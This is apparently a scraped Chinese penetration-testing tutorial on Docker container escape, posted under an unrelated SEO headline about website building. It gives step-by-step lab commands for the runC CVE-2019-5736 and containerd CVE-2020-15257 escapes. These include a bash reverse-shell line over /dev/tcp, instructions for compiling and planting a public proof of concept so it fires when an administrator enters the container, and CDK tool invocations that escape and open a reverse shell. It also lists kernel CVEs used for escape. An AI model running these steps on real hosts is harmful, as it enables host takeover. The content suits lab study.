鄧州做網(wǎng)站網(wǎng)站建設(shè)的推廣渠道
目錄
云原生-Docker安全-容器逃逸&系統(tǒng)內(nèi)核漏洞
云原生-Docker安全-容器逃逸&docker版本漏洞
CVE-2019-5736 runC容器逃逸(需要管理員配合觸發(fā))
CVE-2020-15257 containerd逃逸(啟動容器時有前提參數(shù))
云原生-Docker安全-容器逃逸&CDK自動化
知識點:1、云原生-Docker安全-容器逃逸&內(nèi)核漏洞
2、云原生-Docker安全-容器逃逸&版本漏洞
3、云原生-Docker安全-容器逃逸&CDK自動化
云原生-Docker安全-容器逃逸&系統(tǒng)內(nèi)核漏洞
細(xì)節(jié)部分在權(quán)限提升章節(jié)會詳解,常用:
CVE-2016-5195 CVE-2019-16884 CVE-2021-3493
CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222
云原生-Docker安全-容器逃逸&docker版本漏洞
CVE-2019-5736 runC容器逃逸(需要管理員配合觸發(fā))
影響版本:
Docker version <= 18.09.2
RunC version <= 1.0-rc6
1、安裝docker對應(yīng)版本
apt-get updateapt-get install -y apt-transport-https ca-certificates curl software-properties-commoncurl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"apt-get updateapt-cache madison docker-ceapt-get install docker-ce=18.06.1~ce~3-0~ubuntu
2、啟動靶場環(huán)境測試
docker run -itd --cap-add=SYS_ADMIN ubuntu:latest
3、編譯修改后EXP后等待管理員進(jìn)入容器執(zhí)行
https://github.com/Frichetten/CVE-2019-5736-PoC
bash -c 'exec bash -i >& /dev/tcp/127.0.0.1/8080 0>&1'
修改完畢后,要把這個main.go編譯成main文件
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
docker cp main 7f4793f3ac0cd13:/
chmod 777 main
執(zhí)行main文件? ?./main
真實系統(tǒng)管理員重新進(jìn)入該容器觸發(fā)反彈shell
docker exec -it 7f4793f3ac0cd13 /bin/bash
4、實驗獲取云服務(wù)器上docker搭建的Web權(quán)限后進(jìn)行逃逸
docker run -it -p 8888:8080 vulhub/struts2:s2-053
該工具只能上傳腳本文件目錄,沒法上傳一些執(zhí)行程序,需要拿到webshell利用webshell鏈接工具上傳執(zhí)行程序。
查看當(dāng)前網(wǎng)站目錄
CVE-2020-15257 containerd逃逸(啟動容器時有前提參數(shù))
影響版本:
containerd < 1.4.3
containerd < 1.3.9
1、安裝docker對應(yīng)版本
apt-get updateapt-get install ca-certificates curl software-properties-commoncurl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -add-apt-
repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
apt-get updateapt-cache madison docker-ceapt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1
2、啟動環(huán)境測試:
docker pull ubuntu:18.04
docker run -itd --net=host ubuntu:18.04 /bin/bash //--net=host是前提條件,不加這個參數(shù)啟動的docker沒有這個漏洞
docker exec -it 5be3ed60f152 /bin/bash
3、上傳CDK工具自動逃逸反彈
docker cp cdk_linux_amd64 8e7c27d7b98ca32927:/tmp
chmod 777 cdk_linux_amd64
./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx //這是指定漏洞利用
./cdk_linux_amd64 auto-escape id //自動化漏洞掃描
4、實驗獲取到docker搭建的Web權(quán)限后進(jìn)行逃逸
云原生-Docker安全-容器逃逸&CDK自動化
項目地址:https://github.com/cdk-team/CDK
不支持系統(tǒng)內(nèi)核漏洞
演示-特權(quán)模式
也可以指定漏洞利用